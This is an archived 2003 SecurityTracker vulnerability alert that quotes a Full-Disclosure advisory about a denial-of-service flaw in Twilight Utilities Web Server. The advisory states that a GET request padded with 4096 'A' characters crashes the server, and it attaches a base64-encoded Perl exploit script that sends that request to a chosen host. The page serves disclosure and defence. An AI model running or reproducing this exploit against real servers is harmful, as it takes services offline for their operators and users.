SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Twilight Utilities Web Server Vendors:   Twilight Utilities
Twilight Utilities Web Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006582
SecurityTracker URL:  http://securitytracker.com/id/1006582
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 16 2003
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in the Twilight Utilities Web Server. A remote user can cause the web server to crash.

Security-Protocols Research Labs reported that a remote user can send a specially crafted HTTP GET request to cause the web service to crash. According to the report, a GET / followed with 4096 characters can trigger the flaw.

A demonstration exploit script is provided in the Source Message

Impact:   A remote user can cause the web service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.twilightutilities.com/WebServer.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 14 2003 (Vendor Issues Fix) Re: Twilight Utilities Web Server Can Be Crashed By Remote Users
The vendor has issued a fix.
Jul 14 2003 (More Information is Available) Re: Twilight Utilities Web Server Can Be Crashed By Remote Users
Another exploit is available; also, the vendor has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] Twilight Utilities TW-WebServer/1, 3, 2, 0 DoS


------=_20030415212037_35543
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

SP Research Labs Advisory x02
-----------------------------
www.security-protocols.com

Product - Twilight Utilities TW-WebServer/1,3,2,0

Download it here:
http://www.twilightutilities.com/WebServer.html

Date Released - 04/15/2003

Release Mode - 0hday, why contact the vendor?

Advisory Link:
http://www.security-protocols.com/article.php?sid=1474&mode=thread&order=0

----------------------------

Product Description from the vendor -

We are excited to present this completely new Modem Ready Internet Web
Server supporting these terrific features.

-Installs in seconds
-Lets you INSTANTLY share pictures and files
-Modem aware
-Automates telling friends and family when you start serving
-Automatically integrates your web camera
-Allows others to send files to you
-Automatically generates web pages
-Supports file resume
-A truely unique files-sharing tool

-----------------------------

Vulnerability Description -

To exploit this vulnerability, simply do a GET / with 4096 A's or more
will cause the webserver to go down.  Who really gives a damn right?

Tested on:

Windows XP Pro SP1
Windows 2000 SP3
-----------------------------


2PAC and Snoop Dogg did most of the work on this one.

-----------------------------

peace out,

badpack3t
www.security-protocols.com



------=_20030415212037_35543
Content-Type: application/x-perl; name="sp-urfuqed.pl"
Content-Disposition: attachment; filename="sp-urfuqed.pl"
Content-Transfer-Encoding: base64

IyEvdXNyL2Jpbi9wZXJsDQojDQojIFR3aWxpZ2h0IFV0aWxpdGllcyBUVy1XZWJTZXJ2ZXIvMSwz
LDIsMCANCiMNCiMgVnVsbmVyYWJsZSBzeXN0ZW1zOg0KIyBUVy1XZWJTZXJ2ZXIvMSwgMywgMiwg
MA0KIyANCiMgV3JpdHRlbiBieSBiYWRwYWNrM3QgPGJhZHBhY2szdEBzZWN1cml0eS1wcm90b2Nv
bHMuY29tPg0KIyBGb3IgU1AgUmVzZWFyY2ggTGFicw0KIyAwNC8xNS8yMDAzDQojIA0KIyB3d3cu
c2VjdXJpdHktcHJvdG9jb2xzLmNvbQ0KIyANCiMgdXNhZ2U6IA0KIyBwZXJsIHNwLXVyZnVxZWQu
cGwgPHRhcmdldD4gPHBvcnQ+DQojDQojIGJpZyB1cHMgMjogYWNpZGphenosICNoYXZvYywgcmVn
dWxhdGUsIGNyMHduLCBtcCwgbG9wdCwgDQojIGFpdGVrNSwgcmFiLCAjZGFya25ldCwgZHZkbWFu
LCBiaW5kLCBhbmQgd2hvZXZlciB0aGUgZiBlbHNlLg0KDQp1c2UgSU86OlNvY2tldDsNCnVzZSBz
dHJpY3Q7DQoNCnByaW50ICIuOi4ieCAyMDsgcHJpbnQgIlxuVFctV2ViU2VydmVyLzEsIDMsIDIs
IDAgRG9TLCA8YmFkcGFjazN0XEBzZWN1cml0eS1wcm90b2NvbHMuY29tPlxuIjsNCnByaW50ICIu
Oi4ieCAyMDsgcHJpbnQgIlxuXG4iOw0KDQppZighZGVmaW5lZCgkQVJHVlswXSAmJiAkQVJHVlsx
XSkpDQp7DQogICAmdXNhZ2U7DQp9DQoNCm15ICRob3N0ICAgICA9ICRBUkdWWzBdOw0KbXkgJGRl
ZiAgICAgID0gIkEiOw0KbXkgJG51bQkgICAgID0gIjQwOTYiOw0KbXkgJHBvcnQgICAgID0gJEFS
R1ZbMV07DQpteSAkdXJmdXFlZCAgPSAkZGVmIHggJG51bTsNCg0KbXkgJHRjcHZhbCAgID0gZ2V0
cHJvdG9ieW5hbWUoJ3RjcCcpOw0KbXkgJHNlcnZlcklQID0gaW5ldF9hdG9uKCRob3N0KTsNCm15
ICRzZXJ2ZXJBZGRyID0gc29ja2FkZHJfaW4oJEFSR1ZbMV0sICRzZXJ2ZXJJUCk7DQpteSAkcHJv
dG9jb2xfbmFtZSA9ICJ0Y3AiOw0KDQpteSAkaWFkZHIgICAgPSBpbmV0X2F0b24oJGhvc3QpIAkg
ICB8fCBkaWUgKCJob3N0IHdhcyBub3QgZm91bmQ6ICRob3N0Iik7DQpteSAkcGFkZHIgICAgPSBz
b2NrYWRkcl9pbigkcG9ydCwgJGlhZGRyKSAgfHwgZGllICgieW91IGRpZCBzb21ldGhpbmcgd3Jv
bmcgc3R1cGlkLi4uIGV4aXRpbmcuLi4iKTsNCm15ICRwcm90byAgICA9IGdldHByb3RvYnluYW1l
KCd0Y3AnKSAgICAgICB8fCBkaWUgKCJjYW5ub3QgZ2V0IHByb3RvY29sIik7DQpzb2NrZXQoU09D
SywgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgic29ja2V0IGNvdWxkIG5v
dCBvcGVuOiAkaG9zdCIpOw0KY29ubmVjdChTT0NLLCAkcGFkZHIpIAkJCSAgIHx8IGRpZSAoImNh
bm5vdCBjb25uZWN0IHRvOiAkaG9zdCIpOw0KDQpteSAkc3VibWl0ICAgPSAiR0VUICR1cmZ1cWVk
IEhUVFAvMS4wXHJcblxyXG4iOyAgIA0Kc2VuZChTT0NLLCRzdWJtaXQsMCk7DQpjbG9zZShTT0NL
KTsNCg0Kc3ViIHVzYWdlIHtkaWUoIlxuXG5Vc2FnZTogcGVybCAkMCA8dGFyZ2V0X2hvc3Q+IDxw
b3J0PlxuXG4iKTt9DQoNCnByaW50ICJcbi46LjouOi46LjouOi46LjouOi46LjouIjsNCnByaW50
ICJcbmNyYXNoIHdhcyBzdWNjZXNzZnVsIH4hXG4iOw0KcHJpbnQgIlwuOi46LjouOi46LjouOi46
LjouOi46LlxuIjsNCg==

------=_20030415212037_35543--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC